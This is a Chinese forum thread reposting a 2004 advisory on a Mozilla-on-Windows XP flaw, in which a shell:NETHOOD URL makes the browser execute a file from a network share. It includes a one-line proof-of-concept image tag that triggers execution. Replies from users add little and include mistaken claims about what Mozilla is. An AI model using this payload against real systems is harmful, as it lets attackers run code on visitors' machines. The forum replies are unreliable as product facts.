远程运行可执行程序的shell代码

[START] Advisory TESTED ------ MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616") running on winxp.en.home.sp1a.up2date.20040709 PROCESS ------- Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p". This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD" At last, make MOZILLA request the following URL: shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe A file named "fileid.exe" in the "shared" folder will be executed. REFERENCE --------- MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url: http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html greetingz fly to perrymonj. WINDOWS support "shell:NETHOOD": http://does-not-exist.org/mail-archives/bugtraq/msg02171.html thanks to malware for his additional research , and Cheng Peng Su for his original discovery. ######################### [START] PROOF OF CONCEPT ####################### [IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"] 来源:http://666w.com/art/568.htm

这不叫介绍
只是多了个作者的名字而已

MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
WINDOWS support "shell:NETHOOD":

当在http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html 操纵了有效的shell协议，MOZILLA 将会执行一个文件，windows支持shell:NETHOOD
无语.
汗

MOZILLA 是windows 的么？

Mozilla是个非常好的网页制作和 Web 开发工具,不但可以用作网页编辑器,而且还可
以用作调试工具

下面引用由漫天樱舞在 2005/06/16 11:40pm 发表的内容：
Mozilla是个非常好的网页制作和 Web 开发工具,不但可以用作网页编辑器,而且还可
以用作调试工具

汗。。
Mozilla是linux下的一款浏览器